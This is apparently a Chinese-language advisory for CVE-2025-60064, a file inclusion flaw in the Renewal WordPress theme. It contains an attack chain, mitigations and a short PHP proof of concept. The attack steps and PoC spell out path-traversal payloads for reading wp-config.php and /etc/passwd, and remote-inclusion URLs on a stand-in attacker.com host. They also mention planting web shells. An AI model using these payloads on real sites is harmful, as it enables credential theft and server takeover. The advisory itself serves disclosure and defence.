CVE-2025-60064 WordPress Renewal主题本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-60064

漏洞类型

本地文件包含

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

axiomthemes Renewal WordPress Theme

漏洞概述

CVE-2025-60064是WordPress Renewal主题中的一个高危安全漏洞，CVSS评分达到8.1分。该漏洞属于PHP文件包含类问题，存在于Renewal主题的PHP代码中，由于对文件名控制不当，允许攻击者包含服务器本地文件或通过远程文件包含执行恶意代码。攻击者无需认证即可利用此漏洞，通过构造特定的请求参数触发文件包含功能，从而实现任意代码执行。由于该漏洞影响WordPress主题且利用难度较低，攻击者可能通过自动化工具批量扫描并入侵使用该主题的网站，对网站服务器造成严重威胁。

技术细节

该漏洞的根本原因在于Renewal主题的PHP代码中对include/require语句的文件名参数缺乏充分的输入验证。攻击者可以通过HTTP请求参数控制被包含的文件路径，例如使用路径遍历字符（如../）访问系统敏感文件，或指定远程服务器上的恶意PHP文件URL。当PHP配置中allow_url_include未正确禁用时，远程文件包含将导致攻击者直接在服务器上执行任意代码。即使仅能进行本地文件包含，攻击者也可读取配置文件获取数据库凭证、读取wp-config.php获取WordPress盐值和数据库密码，或包含日志文件实现代码执行。漏洞存在于主题的多个PHP文件中，攻击者需要识别可利用的文件包含点并构造相应的请求参数。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者使用自动化工具扫描互联网上的WordPress网站，识别使用Renewal主题的站点

STEP 2

步骤2

漏洞探测：攻击者访问目标站点的Renewal主题文件，识别存在文件包含功能的PHP文件（如template-functions.php）

STEP 3

步骤3

构造恶意请求：攻击者构造包含路径遍历字符或远程URL的请求参数，如?template=../../../../wp-config.php或?template=http://attacker.com/shell.txt

STEP 4

步骤4

本地文件包含利用：若allow_url_include已禁用，攻击者通过LFI读取服务器敏感文件，获取数据库凭证、WordPress密钥等关键信息

STEP 5

步骤5

远程文件包含利用：若allow_url_include未禁用，攻击者指定远程恶意PHP文件URL，服务器会下载并执行该文件

STEP 6

步骤6

建立持久化访问：成功执行代码后，攻击者上传WebShell或创建后门账户，实现对网站的持久控制

STEP 7

步骤7

横向移动：利用获取的数据库凭证或服务器权限，攻击者可进一步渗透内网其他系统或窃取更多敏感数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
// CVE-2025-60064 PoC - Local File Inclusion
// Target: WordPress Renewal Theme <= 1.2.2

$target = "http://target-site.com/";
$theme_path = "/wp-content/themes/renewal/";

// LFI to read wp-config.php
$lfi_payload = $theme_path . "inc/template-functions.php?template=../../../../wp-config.php";
echo "[*] Attempting Local File Inclusion...
";
echo "[*] Target: " . $target . $lfi_payload . "
";

// Read sensitive files
$files = [
    "../../../../wp-config.php" => "WordPress Configuration",
    "../../../../etc/passwd" => "System Passwd File",
    "../../../../../../etc/hostname" => "System Hostname"
];

foreach ($files as $file => $desc) {
    $url = $target . $theme_path . "inc/template-functions.php?template=" . $file;
    echo "[*] Reading {$desc}: {$file}
";
    // In real attack, send request and capture response
}

// RFI PoC (if allow_url_include is enabled)
$rfi_payload = "http://attacker.com/malicious.txt";
echo "[*] Remote File Inclusion payload: " . $rfi_payload . "
";
?>

影响范围

Renewal Theme <= 1.2.2

防御指南

临时缓解措施

在官方修复版本发布前，建议采取以下临时缓解措施：1）立即禁用或删除Renewal主题，使用其他安全的主题替代；2）在Web服务器配置中添加规则，拦截包含../或远程URL的文件包含请求；3）确保PHP配置中allow_url_include=Off和allow_url_fopen=Off；4）限制网站目录的写权限，防止上传恶意文件；5）启用Web应用防火墙并更新规则以检测文件包含攻击特征；6）监控服务器访问日志，关注异常的包含请求行为。